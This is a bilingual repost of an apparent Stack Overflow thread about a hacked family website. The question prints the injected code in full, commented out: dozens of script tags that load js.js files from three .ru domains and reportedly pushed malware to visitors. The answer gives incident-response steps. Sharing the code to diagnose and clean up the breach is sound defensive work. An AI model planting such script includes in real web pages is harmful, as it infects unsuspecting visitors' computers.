我的网站被黑了.. 我该怎么办? [英] My website got hacked.. What should I do?

问题描述

我父亲今天打电话给我，说访问他网站的人有 168 种病毒试图下载到他们的计算机上.他根本不是技术人员，而是使用 WYSIWYG 编辑器构建了整个项目.

My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.

我打开他的网站并查看了源代码，在源代码的底部紧邻 HTML 结束标记之前，有一行 Javascript 包含.他们包含了这个文件(以及许多其他文件):http://www.98hs.ru/js.js <-- 在访问该 URL 之前关闭 JAVASCRIPT.

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

所以我暂时把它注释掉了.事实证明，他的 FTP 密码是一个简单的字典单词，长度为六个字母，所以我们认为这就是它被黑客入侵的方式.我们已将他的密码更改为 8 位以上的非单词字符串(他不会输入密码，因为他是个打字员).

So I commented it out for now. It turns out his FTP password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).

我做了一个 whois on 98hs.ru 并发现它是从智利的服务器托管的.实际上还有一个与之相关的电子邮件地址，但我严重怀疑此人是罪魁祸首.可能只是其他一些被黑的网站...

I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...

我现在不知道该怎么做，因为我以前从未处理过这种事情.有人有什么建议吗?

I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?

他通过 webhost4life.com 使用普通 jane 不安全的 ftp.我什至看不到在他们的网站上做 sftp 的方法.我在想他的用户名和密码被截获了?

He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?

那么，为了使这与社区更相关，您应该采取哪些步骤/应该遵循哪些最佳做法来保护您的网站免遭黑客入侵?

为了记录，这里是神奇地"添加到他的文件中的代码行(并且不在他计算机上的文件中-我将其注释掉只是为了绝对确保它不会)不要在这个页面上做任何事情，虽然我相信杰夫会防范这个):

For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

推荐答案

尝试收集尽可能多的信息.看看主机是否可以为您提供一个日志，显示与您的帐户建立的所有 FTP 连接.您可以使用这些来查看是否是用于进行更改并可能获取 IP 地址的 FTP 连接.

Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.

如果您使用的是预装软件，如 Wordpress、Drupal 或其他任何您未编码的软件，则上传代码中可能存在允许进行此类修改的漏洞.如果它是自定义构建的，请仔细检查允许用户上传文件或修改现有文件的任何位置.

If you're using a prepacked software like Wordpress, Drupal, or anything else that you didn't code there may be vulnerabilities in upload code that allows for this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.

第二件事是按原样转储网站并检查所有内容是否有其他修改.这可能只是他们所做的一个修改，但如果他们通过 FTP 进入，谁知道那里还有什么.

The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.

将您的网站恢复到已知的良好状态，并在需要时升级到最新版本.

Revert your site back to a known good status and, if need be, upgrade to the latest version.

您还必须考虑一定程度的回报.损害是否值得尝试追踪此人，还是您只是生活、学习和使用更强密码的地方?

There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?

这篇关于我的网站被黑了.. 我该怎么办?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！